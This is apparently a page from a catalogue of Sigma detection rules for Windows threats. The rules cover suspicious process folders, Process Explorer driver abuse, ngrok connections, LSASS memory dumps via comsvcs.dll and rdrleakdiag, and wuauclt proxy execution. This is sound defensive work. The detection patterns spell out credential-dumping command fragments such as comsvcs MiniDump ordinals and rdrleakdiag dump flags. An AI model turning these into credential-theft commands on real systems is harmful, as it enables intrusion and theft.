- https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt
- https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
- https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2019-01-16
modified: 2024-07-12
tags:
- attack.stealth
- attack.t1036
logsource:
category: process_creation
product: windows
detection:
selection:
Image|contains:
- ':\Perflogs\'
- ':\Users\All Users\'
- ':\Users\Default\'
- ':\Users\NetworkService\'
- ':\Windows\addins\'
- ':\Windows\debug\'
- ':\Windows\Fonts\'
- ':\Windows\Help\'
- ':\Windows\IME\'
- ':\Windows\Media\'
- ':\Windows\repair\'
- ':\Windows\security\'
- ':\Windows\System32\Tasks\'
- ':\Windows\Tasks\'
- '$Recycle.bin'
- '\config\systemprofile\'
- '\Intel\Logs\'
- '\RSA\MachineKeys\'
filter_optional_ibm:
Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\'
filter_optional_citrix:
Image|startswith: 'C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\'
Image|endswith: '\CitrixReceiverUpdater.exe'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Process Explorer Driver Creation By Non-Sysinternals Binary
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
view Sigma YAML
title: Process Explorer Driver Creation By Non-Sysinternals Binary
id: de46c52b-0bf8-4936-a327-aace94f94ac6
status: test
description: |
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
references:
- https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer
- https://github.com/Yaxser/Backstab
- https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks
- https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
author: Florian Roth (Nextron Systems)
date: 2023-05-05
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1068
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains: '\PROCEXP'
TargetFilename|endswith: '.sys'
filter_main_process_explorer:
Image|endswith:
- '\procexp.exe'
- '\procexp64.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Some false positives may occur with legitimate renamed process explorer binaries
level: high
Convert to SIEM query
high
Process Initiated Network Connection To Ngrok Domain
Detects an executable initiating a network connection to "ngrok" domains.
Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
view Sigma YAML
title: Process Initiated Network Connection To Ngrok Domain
id: 18249279-932f-45e2-b37a-8925f2597670
related:
- id: 1d08ac94-400d-4469-a82f-daee9a908849
type: similar
status: test
description: |
Detects an executable initiating a network connection to "ngrok" domains.
Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
references:
- https://ngrok.com/
- https://ngrok.com/blog-post/new-ngrok-domains
- https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/
- https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf
author: Florian Roth (Nextron Systems)
date: 2022-07-16
modified: 2025-07-30
tags:
- attack.exfiltration
- attack.command-and-control
- attack.t1567
- attack.t1572
- attack.t1102
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
DestinationHostname|endswith:
- '.ngrok-free.app'
- '.ngrok-free.dev'
- '.ngrok.app'
- '.ngrok.dev'
- '.ngrok.io'
condition: selection
falsepositives:
- Legitimate use of the ngrok service.
# Note: The level of this rule is related to your internal policy.
level: high
Convert to SIEM query
high
Process Memory Dump Via Comsvcs.DLL
Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
view Sigma YAML
title: Process Memory Dump Via Comsvcs.DLL
id: 646ea171-dded-4578-8a4d-65e9822892e3
related:
- id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c
type: obsolete
status: test
description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
references:
- https://twitter.com/shantanukhande/status/1229348874298388484
- https://twitter.com/pythonresponder/status/1385064506049630211?s=21
- https://twitter.com/Hexacorn/status/1224848930795552769
- https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
- https://twitter.com/SBousseaden/status/1167417096374050817
- https://twitter.com/Wietze/status/1542107456507203586
- https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py
- https://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s
author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2020-02-18
modified: 2025-02-23
tags:
- attack.credential-access
- attack.stealth
- attack.t1036
- attack.t1003.001
- car.2013-05-009
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
- CommandLine|contains: 'rundll32'
selection_cli_1:
CommandLine|contains|all:
- 'comsvcs'
- 'full'
CommandLine|contains:
- '#-'
- '#+'
- '#24'
- '24 '
- 'MiniDump' # Matches MiniDump and MinidumpW
- '#65560' # ordinal is 16 bit ordinal, so if you make the number large enough (don't fit in 16 bit space), then it normally wraps around. for e.g ordinal 24 can be also represented by 65560 (65536+24)
selection_generic:
CommandLine|contains|all:
- '24'
- 'comsvcs'
- 'full'
CommandLine|contains:
- ' #'
- ',#'
- ', #'
- '"#'
condition: (selection_img and 1 of selection_cli_*) or selection_generic
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Process Memory Dump via RdrLeakDiag.EXE
Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
view Sigma YAML
title: Process Memory Dump via RdrLeakDiag.EXE
id: edadb1e5-5919-4e4c-8462-a9e643b02c4b
related:
- id: 6355a919-2e97-4285-a673-74645566340d
type: obsolete
status: test
description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
references:
- https://www.pureid.io/dumping-abusing-windows-credentials-part-1/
- https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
- https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/
- https://twitter.com/0gtweet/status/1299071304805560321?s=21
- https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive
author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
date: 2021-09-24
modified: 2024-08-15
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\rdrleakdiag.exe'
- OriginalFileName: RdrLeakDiag.exe
selection_cli_dump:
CommandLine|contains|windash:
- '/memdmp'
- 'fullmemdmp'
selection_cli_output_process:
CommandLine|contains|windash:
- ' /o ' # Output
- ' /p ' # Process
condition: all of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
ProcessHacker Privilege Elevation
Detects a ProcessHacker tool that elevated privileges to a very high level
view Sigma YAML
title: ProcessHacker Privilege Elevation
id: c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9
status: test
description: Detects a ProcessHacker tool that elevated privileges to a very high level
references:
- https://twitter.com/1kwpeter/status/1397816101455765504
author: Florian Roth (Nextron Systems)
date: 2021-05-27
modified: 2022-12-25
tags:
- attack.persistence
- attack.execution
- attack.privilege-escalation
- attack.t1543.003
- attack.t1569.002
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ServiceName|startswith: 'ProcessHacker'
AccountName: 'LocalSystem'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Protected Storage Service Access
Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
view Sigma YAML
title: Protected Storage Service Access
id: 45545954-4016-43c6-855e-eae8f1c369dc
status: test
description: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
references:
- https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-08-10
modified: 2021-11-27
tags:
- attack.lateral-movement
- attack.t1021.002
logsource:
product: windows
service: security
detection:
selection:
EventID: 5145
ShareName|contains: 'IPC'
RelativeTargetName: 'protected_storage'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Proxy Execution Via Wuauclt.EXE
Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
view Sigma YAML
title: Proxy Execution Via Wuauclt.EXE
id: af77cf95-c469-471c-b6a0-946c685c4798
related:
- id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0
type: obsolete
- id: d7825193-b70a-48a4-b992-8b5b3015cc11
type: obsolete
status: test
description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
references:
- https://dtm.uk/wuauclt/
- https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
date: 2020-10-12
modified: 2023-11-11
tags:
- attack.stealth
- attack.t1218
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\wuauclt.exe'
- OriginalFileName: 'wuauclt.exe'
selection_cli:
CommandLine|contains|all:
- 'UpdateDeploymentProvider'
- 'RunHandlerComServer'
filter_main_generic:
# Note: Please enhance this if you find the full path
CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll '
filter_main_wuaueng:
# Note: Please enhance this if you find the full path
CommandLine|contains: ' wuaueng.dll '
filter_main_uus:
CommandLine|contains:
- ':\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId'
- ':\Windows\UUS\amd64\UpdateDeploy.dll /ClassId'
filter_main_winsxs:
CommandLine|contains|all:
- ':\Windows\WinSxS\'
- '\UpdateDeploy.dll /ClassId '
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
Showing 1051-1100 of 1,715